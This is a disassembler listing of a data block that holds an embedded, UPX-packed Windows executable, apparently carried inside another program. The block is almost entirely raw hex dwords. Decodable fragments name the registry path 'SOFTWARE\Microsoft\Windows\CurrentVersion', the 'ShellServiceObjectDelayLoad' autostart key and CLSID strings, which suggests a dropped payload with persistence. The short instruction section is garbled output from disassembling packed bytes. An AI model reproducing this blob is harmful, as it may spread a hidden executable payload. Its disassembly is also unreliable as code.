aMzr db 'MZ',0 ; DATA XREF: sub_40844F+84�o
dw 3
dd 40000h, 0FFFF0000h, 0B80000h, 0
dd 400000h, 8 dup(0)
dd 0C80000h, 1F0E0000h, 0B4000EBAh, 0B821CD09h, 21CD4C01h
dd 73696854h, 6F727020h, 6D617267h, 6E616320h, 20746F6Eh
dd 72206562h, 69206E75h, 4F44206Eh, 6F6D2053h, 0D2E6564h
dd 240A0Dh, 13h dup(0)
dd 45500000h, 14C0000h, 88F20003h, 41CAh, 0
dd 0E00000h, 10B010Fh, 40000006h, 10000000h, 50000000h
dd 98200000h, 60000000h, 0A0000000h, 0
dd 10000040h, 2000000h, 40000h, 0
dd 40000h, 0
dd 0B0000000h, 10000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 0A0000000h, 0D80000h, 1Ch dup(0)
dd 50550000h, 3058h, 50000000h, 10000000h, 0
dd 4000000h, 3 dup(0)
dd 800000h, 5055E000h, 3158h, 40000000h, 60000000h, 3A000000h
dd 4000000h, 3 dup(0)
dd 400000h, 5055E000h, 3258h, 10000000h, 0A0000000h, 2000000h
dd 3E000000h, 3 dup(0)
dd 400000h, 0C000h, 42h dup(0)
db 0Ah
align 2
aInfoThisFileIs db '$Info: This file is packed with the UPX executable packer http://'
db 'upx.tsx.org $',0Ah,0
aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re'
db 'served. $',0Ah,0
dw 5055h
dd 90C2158h, 0A530902h, 0A837A262h, 72695F94h, 381F0000h
dd 70000000h, 4260000h, 7EE93800h, 4D009208h, 300905Ah
dd 3200043Bh, 0FFFFB2C8h, 0F97F40B8h, 4C8377Fh, 0EBA1F0Eh
dd 0CD09B400h, 4C01B821h, 73696854h, 0FDBF7020h, 6F72FFFFh
dd 6D617267h, 6E616320h, 20746F6Eh, 72206562h, 69206E75h
dd 534F4402h, 50ED6D20h, 646FFF60h, 0D0D2E65h, 50C7240Ah
dd 0DBED1345h, 14CFF21h, 888A0002h, 9DE041CAh, 6010B21h
dd 7EE90F08h, 0E022B3h, 10E018A4h, 0F9257325h, 20B6366h
dd 604501Eh, 0C96E676h, 710341Eh, 0F65E5920h, 29E0A006h
dd 0B2017578h, 17C6FDDh, 4D3864D8h, 37903F76h, 7865742Eh
dd 20A22B74h, 96CB6FFBh, 41A00EBh, 65722EE0h, 0CC636F6Ch
dd 677BECA6h, 2623FB9Eh, 107942A2h, 3703D95h, 2CDB3034h
dd 1226669Bh, 46E22FFAh, 9A691B30h, 0B423BAEh, 5E14032Ch
dd 0CD34D36Eh, 562C4AB2h, 4D867062h, 9C4D34D3h, 0E2D4C2AEh
dd 59AE9AF2h, 182D0836h, 463C0728h, 69A69A69h, 786C6254h
dd 9A69B28Eh, 0C6B49EA6h, 4D2F02E2h, 0F4CDB9D3h, 3972E0Ah
dd 344C3C24h, 5C34D34Dh, 9A8A7C6Ah, 0D34D34DBh, 0E6CEC0AAh
dd 59BF2EF2h, 243BA776h, 0F4031087h, 69A6E42Bh, 0CAD4A69Ah
dd 0BAACB6C0h, 0A29A6D60h, 0D72B9098h, 7B66B27Fh, 9603E9B6h
dd 78132F8Ah, 0FF880330h, 66D217FFh, 4F538130h, 41575446h
dd 4D5C4552h, 6F726369h, 0E5666F73h, 74FFFFFFh, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 0FB7F6853h, 536CDB6Fh, 6528760Ch, 656A624Fh, 10447463h
dd 6F4C7961h, 0AD6E6461h, 39477015h, 6739082Bh, 0A5FF3F4Dh
dd 0DB6C2006h, 72617041h, 6E656D74h, 0FA6E495Ch, 53035EDFh
dd 33023B63h, 4C430032h, 5C444953h, 0E77ED923h, 257B00BBh
dd 2D583830h, 0FA5D3404h, 7D0361DBh, 0FCEC8323h, 0F0E89090h
dd 0DEF75706h, 60BAFBBh, 78453759h, 7C737469h, 6046DE82h
dd 62694CFBh, 3B797172h, 656E686Bh, 0BF6ED76Ch, 5FB5DF67h
dd 57791B54h, 7DF60FD5h, 0B565DBFBh, 50677562h, 6CC76972h
dd 23656765h, 7850305Ch, 642E1ED7h, 50580F2Bh, 6F114F4Ch
dd 33D5B737h, 21727270h, 2B6261C5h, 6F667364h, 62360DECh
dd 732E126Fh, 35CBB79h, 0B835A0DDh, 5C214964h, 64723A5Dh
dd 8FB10B7Fh, 5F74511Ah, 5CEC1F33h, 65704F5Fh, 0FE57B218h
dd 4478566Eh, 706E6148h, 0B5AC006Eh, 2D4D37FFh, 4B59542Dh
dd 46475157h, 0E0A4A48h, 0F9ED6113h, 4245411Fh, 48534159h
dd 5B25464Ch, 7B096702h, 32020EFh, 30231205h, 0B0EF7BEEh
dd 0B3A0F32h, 1E331504h, 7FFC8360h, 4A455767h, 4A464B57h
dd 0AB414557h, 0FE9A13BBh, 5349444Eh, 1A034452h, 0A200FF97h
dd 0CBCB901Fh, 1FA60B6Eh, 91218D0Fh, 0A4BCB921h, 31232319h
dd 6D253525h, 0D97FD3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 57740150h
push 24h
dec ch
imul ch
adc eax, 8D1E112Ch
inc ebp
lock push eax
or [eax], ebp
movzx eax, word ptr [ebp-6]
push eax
mov esi, ds:74F3CF20h
iret
; ---------------------------------------------------------------------------
db 0Ah, 0FCh, 50h
dd 0F6F8FE04h, 0FB9B66F4h, 858D50F7h, 0F0755B78h, 3826C068h
dd 36CD10D6h, 0B017ECBBh, 14B468FEh, 0B76A0C4Fh, 4FB7F1Dh
dd 0F9F75999h, 0C283DC5Fh, 2A505205h, 345DD60Ch, 73BDCC10h
dd 38C4832Fh, 68502715h, 3B8129B0h, 5B7776DBh, 80A0BF8Fh
dd 12285750h, 5214220Fh, 647736Eh, 373015A4h, 7D330876h
dd 1766E6B0h, 6A2C310Bh, 0D8986809h, 0C9ECE761h, 28458830h
dd 66FDDB9Fh, 7909372Fh, 68234068h, 77866E02h, 606C986Eh
dd 0C95E5F12h, 0AEF22C3h, 18E11BEFh, 0A91D8B53h, 0FF336726h
dd 0EFFC7D89h, 0FFFCFF0Ah, 10C083D3h, 312C8950h, 0F08BDC1Ch
dd 0FF73B59h, 0EFDB2384h, 6A4937BAh, 3AE4680Ah, 21D1756h
dd 468D056Ah, 0DFB7F00Fh, 0F817B16h, 0D3B41859h, 0F467640h
dd 730FED6Ch, 570C1509h, 24122068h, 3FFB1475h, 0C73BDED9h
dd 18090E75h, 0EB026A04h, 0F84D8D23h, 1337F351h, 111CB3DBh
dd 5E2A2BF8h, 0C2105021h, 823B6EEDh, 5803FA08h, 840A13E9h
dd 0DD77FB62h, 300068F7h, 4C2E5783h, 3BD88B1Fh, 687D74DFh
dd 3AD95C14h, 10481BB7h, 0B70A0468h, 60440EF4h, 6ABFBB6Fh
dd 58F88BF6h, 2B58F868h, 3F45AC3h, 0C28D16F8h, 89F1F4BFh
dd 0CB2BC87Eh, 4689C103h, 7E22210Bh, 0E10DB86Eh, 23B05356h
dd 33E81040h, 0EC6FEEF6h, 0F43C2DFh, 56535056h, 8C3C1656h
dd 770974C6h, 9B8D17EEh, 0C710EB38h, 7EB0431h, 0ECDF3508h
dd 1A250699h, 7D8B0711h, 6A1611Bh, 51615B60h, 0F605746h
dd 66DF8E31h, 61FC96BBh, 0AF0F5424h, 0EB4A31Ch, 75FFFFDEh
dd 0B907A121h, 35247621h, 7BFBC069h, 0C82B7F7Ch, 0C2126851h
dd 2BD998EDh, 0D0F71D58h, 2D2474BFh, 0C7DCF6FBh, 155CC701h
dd 500CA756h, 6BCC033h, 0CA1DD33h, 0A1609A6Bh, 1A3B6C5Dh
dd 0D956D913h, 641A206Ah, 9D8DB438h, 0A2F0DE08h, 0B73816ECh
dd 3019D866h, 0F8C3522Eh, 0DA1B6B02h, 0E10C7DBh, 106A1301h
dd 0E9B3D537h, 14FCAD99h, 284BC610h, 0CD73A702h, 0FDD8780Dh
dd 7C514104h, 7A799D23h, 13E01511h, 59B5E078h, 44CF1F92h
dd 0DB541112h, 0ED372E9h, 83F08B74h, 3902F74h, 5B64D9E8h
dd 0A0567832h, 9D351270h, 6C572119h, 1F5E681Bh, 8986EF8Dh
dd 0DB33537Dh, 64405357h, 6FBDEE90h, 5B83E70Bh, 0BE566C74h
dd 0BF6AA218h, 538C6667h, 890F087Fh, 575015B5h, 3FD2D3ECh
dd 74C0858Ah, 67849F36h, 0E19939D6h, 74766CE6h, 84202613h
dd 71E3EB15h, 5B359BE1h, 895BFC14h, 0FC6157D9h, 5E3FB067h
dd 5B5FC38Bh, 5D8B048Dh, 53575608h, 0FDBEB7FEh, 3D66590Eh
dd 3F76C88Bh, 3C80D144h, 0D745C1Ah, 0FF6DC181h, 151FAF6Fh
dd 0EBEC77C9h, 3B664101h, 1B2373C8h, 0BE17FFC9h, 6DF002B4h
dd 1778F12Bh, 8148DC5h, 1A148A47h, 61059488h, 6D7B6376h
dd 7E6DC718h, 0C62F7AEBh, 90A618B7h, 245C644Ch, 0AF9D560Ch
dd 57FFDDB7h, 10247C8Bh, 197EDB85h, 2EAB0A6Eh, 7D1A6AC0h
dd 0FFFEE678h, 8861C280h, 3B463E14h, 80E77CF3h, 32001F24h
dd 2C02109Fh, 8FFFF8ECh, 84D8B0Ch, 0D895648h, 777550BCh
dd 237BF0C6h, 0A151930Bh, 536FF898h, 0B0B64F84h, 0FC1BDA0Bh
dd 2404C711h, 7B01C75Ch, 59D676F6h, 2E7559D7h, 13546815h
dd 0B37ECBF0h, 93B4E1Ah, 4080B27h, 0E1610CEBh, 68F1BDAFh
dd 0A929193Ch, 505959E0h, 95F7C358h, 0CC27027h, 1703189Bh
dd 0B3637289h, 6801FB3Dh, 0D1261294h, 3DA88F59h, 85BD95B7h
dd 1FE934Fh, 0BF5D940Eh, 64C9C9ADh, 7B575D9Ch, 7C9DF8F0h
dd 30BB6D93h, 9F6880A5h, 0B44EB1E1h, 0C0A359CDh, 0ACA43F00h
dd 315F5F7Bh, 12353C7Ch, 960C7024h, 4505B36Eh, 0E564BFA0h
dd 5A786657h, 6DB755A0h, 9B9C2613h, 5FDB93Dh, 0E8E6EBEBh
dd 34680CFCh, 6CC7580Ah, 7B167716h, 2733756Ah, 5F17E15Dh
dd 0E804F7E3h, 0E69FD8CDh, 0A2F18B76h, 0C79CFC18h, 41135006h
dd 0E3998C65h, 196A1A1Dh, 0B60514C0h, 26108D66h, 1F20B710h
dd 57816E74h, 257126Dh, 6F09B0C3h, 0D7611EB5h, 0B7518C8h
dd 2DC05935h, 147E89FFh, 57571CEBh, 0AC470957h, 3EB799BEh
dd 99741446h, 16012046h, 5FC68B1Ch, 0C6D77F68h, 6283568Dh
dd 44F6420Fh, 20010824h, 11DB66D8h, 1D5920D6h, 3DA21B5Eh
dd 0FB59BB6Fh, 9D5C8BEAh, 74037468h, 0DB768BD7h, 14ED95A3h
dd 5609F685h, 752A6146h, 0B7F6FB7Fh, 0F03BDF1Ch, 718D0375h
dd 8318515Bh, 392527FAh, 6752045h, 0FDB035B2h, 5104C183h
dd 20D003EBh, 14021847h, 0D674B3F5h, 4552AF10h, 1CC25DB4h
dd 0D8055EB6h, 7AC4B870h, 0E510E41Ah, 4FF42BEh, 20C46818h
dd 896A9A7Ah, 0CED8C847h, 86A00E4h, 0D8C8CC18h, 0C4202BD8h
dd 4C351016h, 0D03211D9h, 0B08D18D4h, 0B2C1A05h, 0D81B6914h
dd 8E7C1D19h, 0A04514h, 565E5308h, 12CC170Ah, 4D61605Eh
dd 660BB8FCh, 940AC604h, 83ABC040h, 0DDEDC0B3h, 21170BDh
dd 0EA8B0575h, 12CB3CEBh, 0C187CD06h, 6810AFBCh, 1A8A53A4h
dd 36276FCh, 3931EB76h, 0BA5D0C7Dh, 191E05D2h, 2EB17D0h
dd 5BB81EE0h, 30F6DD6Bh, 8D00575Fh, 0DC91AE71h, 344AC57Eh
dd 0E942189h, 6DAE08C2h, 0BF98F138h, 78570880h, 12DB098Eh
dd 85E8BEFh, 2F0C331h, 74C3FDF4h, 7449205Ch, 0C7C82C14h
dd 0A2659BA1h, 7AC4660Dh, 5C68DD4Ah, 4D6D46E2h, 510CEFE8h
dd 63FFBA4Fh, 0FC26F135h, 0C01BD8F7h, 5FC2456h, 9B5071E4h
dd 6FC5D483h, 0E59518A8h, 0B36AC503h, 0FFB191B7h, 753BC445h
dd 93C0940Fh, 1F068FB6h, 4A3EF9D9h, 0B18BCC26h, 4D17DE35h
dd 6895910h, 0CFA69106h, 0B986F977h, 8A040883h, 1010E04h
dd 5D270C46h, 106D78FBh, 7AD518E7h, 534244C7h, 76398D9Dh
dd 0F66AD943h, 57465945h, 0B2436206h, 3D06CB3Eh, 2B6DF6AAh
dd 0B54CB46Ch, 89630CC9h, 4B565F01h, 5DDC6214h, 418B4C5Bh
dd 0B455A420h, 314CDED6h, 3F6856E1h, 5D00A4CFh, 88661647h
dd 5741415h, 336CEB67h, 0A6278CDCh, 1DA9AAh, 9C1B6332h
dd 0F5E6803h, 2F6DB804h, 66602061h, 573B60Fh, 0BB648AFBh
dd 9897785Eh, 1261C10Bh, 52135868h, 0FBC228D0h, 0A1642E21h
dd 25896408h, 0C7CEA307h, 0D22CDDC6h, 0A5E86589h, 27240C29h
dd 7BD757F4h, 30BBBB0h, 0F86850C3h, 0B76CC0Ah, 4014E4B4h
dd 0E12E0F40h, 0B916D170h, 0AF3861E0h, 0A9522B34h, 6BFBF192h
dd 9B6990B3h, 94DC1AFAh, 85930D9Bh, 4390A153h, 5B4F9493h
dd 16F8B6EBh, 42392FE4h, 45F7DB08h, 0DA2DC0BFh, 7C5B3BC8h
dd 201E7C80h, 44C60573h, 6FE25A6Dh, 0EB402E06h, 1F76FFE9h
dd 0E0757546h, 86E1BC3h, 0E00381AEh, 0B9616480h, 3105BAB1h
dd 4D450CCh, 0A6DDA60Ch, 1D5FA246h, 50DA1E08h, 0CF3CD804h
dd 0D4D63CF3h, 9ED2CECCh, 46D979E7h, 746B60Ah, 6A040506h
dd 18F9EF9Eh, 2040308h, 53B60601h, 6A716023h, 58859215h
dd 0E8130340h, 98C95790h, 0BF723EC4h, 0C49A8598h, 50AE2350h
dd 6B6F683Fh, 21D00ADCh, 59504208h, 623E3786h, 0C483D911h
dd 0D20EEBFFh, 0C2BE1696h, 0C758BC3h, 0F185598Bh, 37D3D907h
dd 0CF1CBEFAh, 0E07D83h, 160EE070h, 96841A46h, 0B4F072CCh
dd 8A70F20Dh, 0D8FBCE71h, 0C9F0F468h, 0C8833811h, 0CDF6ABFFh
dd 9FA17C2Ch, 3B0C55C0h, 0D7992D6h, 0B42E9EA5h, 1DE677FCh
dd 7AF286E4h, 0BB4BFFFFh, 0CE8B135Eh, 0CA3BDCA6h, 48A2973h
dd 0C0458839h, 972303Ch
dd 1D73393Ch, 7D778F4Dh, 0D6AC0F8h, 74B84B0Ah, 8BE4797Fh
dd 6EBD8F1h, 0FD0EB41h, 28850F39h, 0BD1FEDBCh, 3BF64A8Dh
dd 5C1548F1h, 0DFFFFD73h, 8D0088D1h, 0C13B144Eh, 0C23B2A7Dh
dd 0C8A2673h, 0BC4D8838h, 9A2DF980h, 0A53B6B1h, 0C9595404h
dd 37DBDB77h, 253075DBh, 65830409h, 391000D4h, 0AFA0D44Dh
dd 76DED966h, 3B568DBFh, 8A1F75C2h, 0D8E8B838h, 80C9A78h
dd 43A41905h, 0D8CC36C1h, 0D4ADF8D6h, 5181802Eh, 3C62D0F6h
dd 8D0B0211h, 77770CD0h, 8D020FD8h, 1B503E04h, 3E440E02h
dd 639E0F02h, 46D0498Ch, 5C1180D3h, 8D00AD8h, 83C40B12h
dd 37B704C8h, 5C24AEEh, 0C40A7F32h, 4057C01h, 895D7E0Ch
dd 0A1A06237h, 6E31043Eh, 5AD40506h, 7530E6ECh, 74310607h
dd 30032C18h, 97AD1B0Bh, 6846D709h, 6D4A10D8h, 921418BBh
dd 0EA76E00Ah, 30A10B84h, 0C3C3C588h, 0E4239098h, 9CDB5878h
dd 0C5691967h, 5DB3D35Dh, 3C80FDB0h, 662E9EBFh, 2F4F048Bh
dd 7E10F2A0h, 0D7C35B9h, 0E33A097Fh, 0C33BC475h, 5321C972h
dd 61505BCBh, 2E5335BBh, 470C572Ah, 7EC59C62h, 7CB2BF08h
dd 75EB590Eh, 75CB3BC9h, 2CB0D332h, 5D5D974Ch, 0B34DEFC6h
dd 753DBF74h, 98479124h, 0B1640C10h, 9DCB3043h, 0C26F3394h
dd 0CBBBC3E9h, 0BE4C5306h, 1966900Bh, 4CACC84h, 5FF2C477h
dd 770465C2h, 0C483DA04h, 6A535330h, 0DF074C0Ah, 0FF0CACD6h
dd 20AB5325h, 0CE46497Ah, 27CCB815h, 0D91BD9AFh, 1EA8E4AAh
dd 9037D90Ch, 0A48D91h, 0F3A3A8A8h, 66F1A36Fh, 857C83h
dd 300A0710h, 304B0875h, 310CEC3Ch, 9E0F75BEh, 11C847FFh
dd 885216C8h, 394AE60h, 6EB7FA26h, 5CFD4B46h, 6212ECEBh
dd 57C33DC8h, 0C58B7D68h, 6177E80h, 0CE6D423Ah, 196D866Dh
dd 0F51A1CA5h, 29C11E05h, 936CD263h, 24D00C22h, 0D6FABE8h
dd 2B365EFEh, 9B3003F3h, 56EED1B8h, 6DAFC116h, 0C60E16F0h
dd 140A0DFFh, 0B472B54Ah, 6F202A2Ah, 50B33709h, 903722A8h
dd 11740BF0h, 28D1BF6Eh, 2B990F39h, 0EF8D1C2h, 56B1027Eh
dd 0F923EB63h, 0AB2C0D33h, 0D1CB7615h, 0F9D10F6Fh, 5F70818Dh
dd 66057E27h, 0E9A17FB7h, 0AC16EBACh, 3B0279FEh, 4173B87Dh
dd 2D2BB8F8h, 0EC1342F6h, 1F04AD90h, 2D726750h, 3DBC4B6h
dd 0D19015F7h, 55C7D8E8h, 0F336DB19h, 165543A3h, 6F470B0Eh
dd 1EDF647Dh, 3BF07FFFh, 8D067CF7h, 0BAEB017Eh, 0A4C7814Fh
dd 0FE3BA6E2h, 0FC1E0473h, 0F78BD5B6h, 0FC5F4EACh, 0AC752B00h
dd 90A17622h, 24A30Ch, 0A6040789h, 0A4FB5CD9h, 0F5044789h
dd 0C80807F9h, 528512B4h, 98A7A9CBh, 1A3721C0h, 1047322Bh
dd 0BA10B110h, 0C7448E95h, 0D527A1A5h, 4582AA32h, 186E401Dh
dd 3C609436h, 48689757h, 76192BB5h, 15B8A05Bh, 9E9C980Eh
dd 0E9518E0Ch, 0C73E9193h, 0E05DCE35h, 1E142A2Eh, 46110B74h
dd 5BF86A6Eh, 9A04850Bh, 0B88C8B5Ah, 0CA532084h, 5B1F77B9h
dd 0DC24D771h, 1AE85589h, 4BD3C8Dh, 69AD7E17h, 72B43C9h
dd 0A4028DA0h, 0D49F1B10h, 0F5608501h, 0FEBB0300h, 0E0358605h
dd 0F9B86857h, 85731345h, 0B80ECC30h, 893E4816h, 0EC18DB59h
dd 62853913h, 0A441AFA2h, 0ACEA01A3h, 72696BE0h, 0FF646F7Fh
dd 4E5D0734h, 12C540BBh, 0CD9B82A0h, 97314A95h, 50271068h
dd 39CE84ECh, 0CDE98C4h, 0EE721183h, 7A3D8BA5h, 0A0B912FEh
dd 52C5A8DBh, 0AC017CC0h, 0DBFB7B1Bh, 18397517h, 0B37EBE5h
dd 0D01C8DE0h, 0F65C6C51h, 110319B0h, 0F2001BEh, 0B1DBFD7Bh
dd 1B06282Bh, 151ABD6Fh, 0B5FFCC38h, 99F9A3C4h, 0CCD04DCDh
dd 8C0E1863h, 0B0DDDBBh, 84EB711Eh, 0D31B30CBh, 9D90D868h
dd 75B8B9ECh, 4B4F9969h, 13261098h, 80535306h, 404C244Fh
dd 6A91EB4Eh, 1304B764h, 87EB5F47h, 8C6439Ch, 0DB86C20h
dd 0ABBAE88Ch, 6A4263C7h, 0D72F5D34h, 0C6C70C11h, 6359F460h
dd 0B2C87DAFh, 0B8500460h, 91223F0h, 8C1911ECh, 0EEC86154h
dd 8359C80Bh, 4D8351C7h, 60C07CC8h, 5778EBF1h, 45F1C28h
dd 5AF08EC6h, 0AC0B1B6Bh, 4C330E8Bh, 9899DAB7h, 213976D0h
dd 51A6C8B5h, 24CFB833h, 0A2893E89h, 4420FCBBh, 527DB884h
dd 84AF6425h, 477E97D6h, 0C208C683h, 5ECF72F0h, 0CC0400A7h
dd 5F78D81Dh, 0D574C4C7h, 0AE075328h, 0D1350CBFh, 280F474Ch
dd 666A9F11h, 138B67E8h, 25FF2C11h, 91054808h, 4C8C8E7h
dd 0F410F800h, 919AC16Ch, 0CCECF0h, 0EC27E819h, 0DCE08C8Ch
dd 0F33D5100h, 767D1BF6h, 7208F58Dh, 87E98114h, 162D662Dh
dd 85EC7F6Fh, 0EC731701h, 0C48BC82Bh, 8BE18B0Ch, 0B748C8F1h
dd 0C33140C1h, 8C88804Fh, 8CC8869Fh, 60B8E999h, 0C96F6029h
dd 3A1D77C9h, 88C813h, 0F4F7284Ah, 19930520h, 7E1680E1h
dd 0D03DCC39h, 271B34F7h, 6F5085A8h, 0DF1B4820h, 0D97972Eh
dd 2C32132Bh, 2A7410DCh, 4BCB3580h, 6C1C2F7Ch, 0CB203A27h
dd 142FD6E5h, 30585811h, 0AC765CDAh, 132B805Fh, 0E8112898h
dd 578C2089h, 9F7202A6h, 0E6B5BFE5h, 6D029709h, 70636D65h
dd 65739979h, 97FCB3B9h, 7302BE74h, 656C7274h, 0C302C56Eh
dd 6BCFDD3Bh, 1D616309h, 0D3A631BAh, 3F7FB76Ch, 5940333Fh
dd 2505841h, 0F0F5A40h, 0F837FD32h, 0F490E3Ah, 7865AACAh
dd 74706563h, 6EDD685Fh, 725243D1h, 43023DC1h, 0ADB3696Fh
dd 491BB2FDh, 7878435Fh, 48758546h, 0DEA3781Dh, 4513AF0Ah
dd 6C825F48h, 0BD42676Fh, 0D0310B41h, 7B545243h, 3DB67D9Ch
dd 14E4957h, 38F0C45h, 0B6418A6Ch, 7933DEE0h, 240BAA0Bh
dd 76A83743h, 0BDBFB542h, 54600D60h, 7474DEDBh, 6FD35265h
dd 0B7BA8105h, 37FFDB6h, 0E697257h
dword_4439A4 dd 73966250h db 73h, 4Dh, 1Bh
byte_4439AB db 72h ; DATA XREF: sub_44A577+3�o
dd 0EED7FB9Bh, 470189C7h, 644113F6h, 11177264h, 0A5D82E67h
dd 6C75213Ah, 0D8095F4Fh, 356FFDAh, 74726956h, 416C6175h
db 84h
dword_4439D5 dd 0A84452Ah db 0C1h, 1Ch, 75h
dd 4C310261h
db 35h
dword_4439E1 dd 0FFEA9BB5h dword_4439E5 dd 63695433h db 6Bh, 43h, 6Fh
dd 2074E75h, 86B60649h, 2BD5AEEDh, 2E64656Bh, 97670363h
dd 0C04AEB57h, 50754D41h, 930F6555h, 0A1364DEAh, 0DAD1452Fh
dd 5961FDFEh, 6C5F0388h, 0F500DB63h, 461D5302h, 0A56DBC80h
dd 0D6D6710h, 9E47014Fh, 8BDD70E0h, 0B8F6F25h, 0D5797021h
dd 0A66BF6B6h, 0F795323h, 1EBE44EBh, 0C5AE6ECh, 27316F1h
dd 4E32335Bh, 26B2BB6h, 497530D7h, 0E6C8718Ch, 6525CB68h
dd 0DF68AD06h, 6F70AA96h, 1870B0A3h, 70616E53h
db 61h, 6Bh
dword_443A76 dd 6F2846DDh dw 0D51Bh
dd 1E627F43h, 82DB784Bh, 6D654144h, 0BB4645DBh, 4EA57C33h
dd 32915EAh, 37140B53h, 0EC16D8h, 6E1A2FDAh, 0F92FD230h
dd 0D5AACD86h, 0C85AC3ACh, 4CF2DAD6h, 11A04561h, 66F74685h
dd 76453B9Dh, 0F4A1FAEh, 0C2B46064h, 7F7AAEh, 49FB6544h
dd 671E886Fh, 4C76D6D5h, 1F31E500h, 80007965h, 2ED56137h
dd 5DC88702h, 13868D96h, 6592453Ch, 4466123h, 68D80160h
dd 426C2553h, 0F8D4CF75h, 4902A900h, 2DEB721Ch, 0AD6C735Bh
dd 430A7043h, 53C2694Ch, 7386C9BDh, 765F3D21h, 4B08C288h
dd 9F79D528h, 0F436BBF1h, 0FF501C68h, 45007D18h, 0F6532EDBh
dd 69694508h, 9F685C64h, 428DB76Ah, 146C2767h, 0CA267942h
dd 55D1CE6Eh, 6927284Fh, 330787Ah, 9B556309h, 6AB00F45h
dd 0F8DFE9h, 3C52454Bh, 5D0BC74Ch, 2D870A9h, 6682635Dh
dd 0C2187B71h
db 8Ch, 25h
dword_443B72 dd 71D6FC80h dw 0E9C3h
dd 65061789h, 64D07267h, 3B36ED25h, 0E3007Ch, 553F0CAFh
dd 76B65A53h, 1C5761E1h, 756AF900h, 0B06BB3EEh, 149C009Dh
dd 17D73B7h, 0ADC936C3h, 7075126Fh, 0A7759656h, 6901621Eh
dd 343D01A8h, 16F0528Bh, 0C620D48Eh, 0F8A9654Bh, 4336440Dh
dd 9A3034CCh, 0D6D8CC1Fh, 20EC3BDFh, 56444112h, 4B83496Fh
dd 25617942h, 27556F43h, 67856C11h, 47300F66h, 390F5475h
dd 0D6036B0Dh, 916F1F49h, 5160AE3Ch, 0FFCE0084h, 3F50DFD6h
dd 60335C33h, 3A336C33h, 3380337Ch, 0FF90338Ch, 33FF06FFh
dd 33B933AFh, 1BEB33C4h, 22340934h, 53343134h, 79345A34h
dd 0FF348434h, 0A8FFFFFFh, 0CC34BB34h, 634F634h, 31352B35h
dd 4E353B35h, 7D355D35h, 8E358835h, 9D359335h, 0FF35A735h
dd 0B4FFFFFFh, 0EA35D335h, 1035F535h, 40363536h, 5B364836h
dd 66366136h, 90367736h, 0AB369736h, 0FF36B236h, 0C2FFFFFFh
dd 0E636D136h, 18370436h, 2A372337h, 53373937h, 6F376837h
dd 0F237C237h, 6937F937h, 5638B738h, 0CCFFFFFFh, 0EB38DE38h
dd 2938FF38h, 5C395039h, 94398039h, 0A5399A39h, 0A539B839h
dd 0FFFFFFFFh, 39CB39C5h, 39D839D2h, 39E539E0h, 3A0D39F8h
dd 3A4F3A48h, 3A923A84h, 3AE43AA5h, 0FF3F3AEDh, 3BF16FFFh
dd 0E273C12h, 3F3C383Ch, 0A33C5E3Ch, 0BE3CB13Ch, 43CF23Ch
dd 0FF3DC73Dh, 0E5FFFFFFh, 133DF53Dh, 343E183Eh, 793E3A3Eh
dd 983E7F3Eh, 503EE93Eh, 643F573Fh, 7B3F6B3Fh, 3F3F863Fh
dd 98FFC34Ah, 0D13FCB3Fh, 0F13FEC3Fh, 73200F3Fh, 0FFFE302Ah
dd 31B0FFFFh, 330A31B5h, 332A3320h, 33B03337h, 355333B5h
dd 36153566h, 3633362Ch, 3657364Ah, 0FFFFFFDCh, 36ECC3EFh
dd 37B43758h, 37F437C8h, 383637FAh, 38473840h, 38873859h
dd 38A03899h, 0BFFF38A6h, 38ACFFFBh, 38B838B2h, 38C438BEh
dd 0D1D838D2h, 39283922h, 393D392Eh, 39683951h, 40043984h
dd 3990E358h, 9200F0ACh, 0FF8A1281h, 0FF65F7D0h, 0D00F75ABh
dd 0BE6E3149h, 1ABF031Ah, 37DD0715h, 4D687CDFh, 37361AADh
dd 3F1AB44Dh, 1AB868F6h, 4F522730h, 69E71464h, 5076863h
dd 0B535F700h, 727CE4B9h, 31400140h, 2EB079Fh, 97139ABEh
dd 0D2C31A0h, 0E9D8C80Bh, 403F601h, 7BC51927h, 0CA3BA0F2h
dd 0DB0725FEh, 7C538A31h, 34603A30h, 0CEC2689Fh, 0E00492BDh
dd 304F2338h, 0BC28A703h, 831CC840h, 2A7676A9h, 295407A3h
dd 0A207602Bh, 7628C2Dh, 642B3B92h, 7461525Eh, 80FBE761h
dd 46435307h, 0D8C80731h, 58DD65B2h, 2307AF54h, 0B34F072Ch
dd 0E21D0A8Dh, 0D19F2Eh, 98A323EBh, 780F37Dh, 60E13B57h
dd 2B27F14h, 0ED07C003h, 7F314651h, 0EB0332E2h, 0ACB36CEh
dd 32F61833h, 0AA0BC013h, 9A69A603h, 60DE94A6h, 0B2C8384Ah
dd 10FA9AEBh, 7A8B267Fh, 34D34433h, 3BC6375Dh, 7E9603B2h
dd 34D3656Ah, 2E3E5E4Dh
db 16h
dword_443EA1 dd 0A69A31FEh db 69h, 9Ah, 0E6h
dd 8CA6B8D0h, 9630E374h, 93315C6Dh, 0DF27025Bh, 4AA40414h
dd 83535126h, 722EFFC9h, 0C1F954BFh, 20BB5051h, 0EAB75F20h
dd 0C5FC821Fh, 7D8B2856h, 88B9C5FCh, 778297D4h, 0F3C0332Eh
dd 358B5DABh, 0B73D0328h, 88A06E89h, 0E88845E4h, 6C8C1405h
dd 0E08EE93h, 0D8D41DE4h, 872321C8h, 78DCD4D8h, 0E0C87632h
dd 5DC0EE0h, 0EF92E4ECh, 0AD6E123h, 0B9FFF4FCh, 0C0839EC1h
dd 0AC04133Ch, 33FC4EA6h, 0B78239F6h, 0F875F772h, 68144875h
dd 382205FCh, 0CCD6646Ah, 0C4C83DF7h, 13221B22h, 333BEF18h
dd 1C1634D9h, 0FF147414h, 500F3870h, 1682BAFBh, 1009FC8Bh
dd 0A214EAh, 0E0CCBE7Ch, 0E14BF8D8h, 0CC86192Eh, 0F105F7Dh
dd 1CA8EB7h, 70AC763Fh, 8D282A21h, 3B07F1BEh, 0C81274C7h
dd 8BFFEEF6h, 88B0450h, 890A8950h, 441B0451h, 1DE8EB5Eh
dd 3D8FB7D4h, 588D3F72h, 3D831FC4h, 4192C60h, 5B6F4175h
dd 4E8D0CF1h, 0B02BA3Ch, 0CD404688h, 0A1DB0FD8h, 0C91AD24Ch
